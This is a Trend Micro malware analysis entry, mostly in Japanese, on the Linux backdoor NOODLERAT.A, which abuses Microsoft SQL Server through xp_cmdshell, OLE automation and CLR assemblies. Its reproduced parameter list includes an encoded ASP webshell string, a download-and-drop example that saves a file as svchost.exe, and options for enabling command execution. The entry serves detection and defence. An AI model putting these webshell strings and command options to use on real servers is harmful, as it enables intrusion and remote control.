Trend Micro Security

Backdoor.Linux.NOODLERAT.A

2024年11月14日
 解析者: Neljorn Nathaniel Aguas   
 プラットフォーム:

Linux

 危険度:
 ダメージ度:
 感染力:
 感染確認数:
 情報漏えい:


  • マルウェアタイプ: バックドア型
  • 破壊活動の有無: なし
  • 暗号化:  
  • 感染報告の有無: はい

  概要

感染経路 インターネットからのダウンロード, 他のマルウェアからの作成

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

  詳細

ファイルサイズ 2,998,440 bytes
タイプ ELF
発見日 2024年10月23日

侵入方法

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

その他

マルウェアは、以下を実行します。

  • It is used to interact with Microsoft SQL Server for command execution, file transfer, and assembly management.
  • It performs the following:
    • Execute commands via xp_cmdshell, sp_oacreate, and CLR assemblies.
    • Upload and download files using OLE automation.
    • Create and execute CLR assemblies within SQL Server.
    • Enable or disable xp_cmdshell and OLE automation procedures.
    • List running processes and perform network statistics checks.
    • Supports interactive and non-interactive modes.
    • Load and execute shellcode on the target system.

マルウェアは、以下のパラメータを受け取ります。

  • help, h → Shows a list of commands or help for one command
  • --server {value}, --host {value}, -s {value} → The database server (default: "127.0.0.1")
  • --user {value}, -u {value} → The database user (default: "sa")
  • --password {value}, -p {value} → The database password
  • --database {value}, -d {value} → The database name (default: "msdb")
  • --port {value}, -P {value} → The database port (default: 1433)
  • --option {value} → -xcmd, -X powershell (default: "whoami")
  • --query {value}, -q {value}, --sql {value} → SQL query (default: "select @@version")
  • --cmd {value}, -c {value}, --exec {value} → Exec System Command | xp_cmdshell命令执行 (default: "whoami")
  • --cmd1 {value}, --c1 {value} → Exec System Command | sp_oacreate无回显执行 (default: "whoami >C:\whoami.log")
  • --cmd2 {value}, --c2 {value} → Exec System Command | sp_oacreate有回显执行 | wscript.shell (default: "whoami")
  • --cmdsp {value} → Exec System Command | sp_oacreate有回显执行 | {72C24DD5-D70A-438B-8A42-98424B88AFB8} (default: "whoami")
  • --cmd3 {value}, --c3 {value} → Exec System Command | clr执行 | clr命令参考: https://github.com/uknowsec/SharpSQLTools/ (default: "clr_exec whoami")
  • --cmdpy {value} → Exec System Command | clr执行 | clr命令参考: https://github.com/Ridter/PySQLTools (default: "clr_exec whoami")
  • --cmd4 {value}, --c4 {value} → Exec System Command | 自写clr执行 (default: "-c4 net -c5 user")
  • --cmd5 {value}, --c5 {value} → Exec System Command | 自写clr执行 (default: "-c4 net -c5 user")
  • --cmd6 {value}, --c6 {value} → Exec System Command | xp_cmdshell命令执行|过滤了xp_cmdshell等关键字提交方法语句 (default: "-c6 whoami")
  • --cmd7 {value}, --c7 {value} → Exec System Command | 自写clr执行 (default: "-c7 whoami")
  • --cmd8 {value}, --c8 {value} → Exec System Command | r language command (default: "-c8 whoami")
  • --cmd9 {value}, --c9 {value} → Exec System Command | python language command (default: "-c9 whoami")
  • --cmd10 {value}, --c10 {value} → Exec System Command | createAndStartJob command (default: "-c10 whoami >c:\windows\temp\123.txt")
  • --cmd11 {value}, --c11 {value} → Exec System Command | 自写clr执行 | --option -x --cmd11 cmd | --option -X --cmd11 powershell (default: "--option -x --cmd11 cmd")
  • --dir {value}, --dirtree {value} → xp_dirtree列目录 | dir c:
  • --path {value} → 网站路径 -path + -code | c:\inetpub\wwwroot\cmd.asp (default: "c:\inetpub\wwwroot\cmd.asp")
  • --local {value} → 本地路径 localFile (default: "c:\1.txt")
  • --remote {value} → 远程路径 remoteFile (default: "C:\Windows\Temp\1.txt")
  • --code {value} → -path + -code | 如果代码有"就加\来匹配<%eval request("cmd")%>网站路径和asp密码默认:LandGrey (default: "<%@codepage=65000%><%@codepage=65000%><%+AHIAZQBzAHAAbwBuAHMAZQAuAGMAbwBkAGUAcABhAGcAZQA9ADYANQAwADAAMQA6AGUAdgBhAGwAKAByAGUAcQB1AGUAcwB0ACgAIgBMAGEAbgBkAEcAcgBlAHkAIgApACk-%>")
  • --downurl {value} → 下载文件的url地址 | http://www.microsoft.com/defender.exe
  • --filepath {value} → 下载文件的路径 | c:\programdata\svchost.exe
  • --debug → Debug info
  • --enable, -e → Enabled xp_cmdshell
  • --disable, --diclose → Disable xp_cmdshell
  • --ole, --oleopen → Enabled sp_oacreate
  • --dole, --dolose → Disable sp_oacreate
  • --clr, --clropen → Enabled clr enabled
  • --dclr, --dclose → Disable clr enabled
  • --rlce, --rlceopen → r|python languag eenabled
  • --jobopen → MSSQL Agent Job服务开启
  • --install_clr, --in_clr → install clr | --cmd3 "clr_exec whoami" | clr命令参考: https://github.com/uknowsec/SharpSQLTools/
  • --uninstall_clr, --un_clr → uninstall clr | --cmd3 "clr_exec whoami"
  • --installpy_clr, --inpy_clr → installpy clr | --cmdpy "clr_exec whoami" | clr命令参考: https://github.com/Ridter/PySQLTools
  • --uninstallpy_clr, --unpy_clr → uninstallpy clr | --cmdpy "clr_exec whoami"
  • --install_clrcmd, --in_clrcmd → install clrcmd | "--c4 net --c5 user"
  • --uninstall_clrcmd, --un_clrcmd → uninstall clrcmd | "--c4 net --c5 user"
  • --install_clrcmd1, --in_clrcmd1 → install clrcmd1 | --cmd7 "whoami"
  • --uninstall_clrcmd1, --un_clrcmd1 → uninstall clrcmd | --cmd7 "whoami"
  • --install_clrcmd2, --in_clrcmd2 → install clrcmd2 | --cmd11 "whoami"
  • --uninstall_clrcmd2, --un_clrcmd2 → uninstall clrcmd2 | --cmd11 "whoami"
  • --upload → --upload --local c:\svchost.exe --remote C:\Windows\Temp\svchost.exe
  • --help, -h → show help

  対応方法

対応検索エンジン: 9.800
初回 VSAPI パターンバージョン 19.704.05
初回 VSAPI パターンリリース日 2024年11月8日
VSAPI OPR パターンバージョン 19.705.00
VSAPI OPR パターンリリース日 2024年11月9日

手順 1

トレンドマイクロの機械学習型検索は、マルウェアの存在を示す兆候が確認された時点で検出し、マルウェアが実行される前にブロックします。機械学習型検索が有効になっている場合、弊社のウイルス対策製品はこのマルウェアを以下の機械学習型検出名として検出します。

     
    • Troj.ELF.TRX.XXELFC1DFF045

手順 2

最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Backdoor.Linux.NOODLERAT.A」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。


ご利用はいかがでしたか? アンケートにご協力ください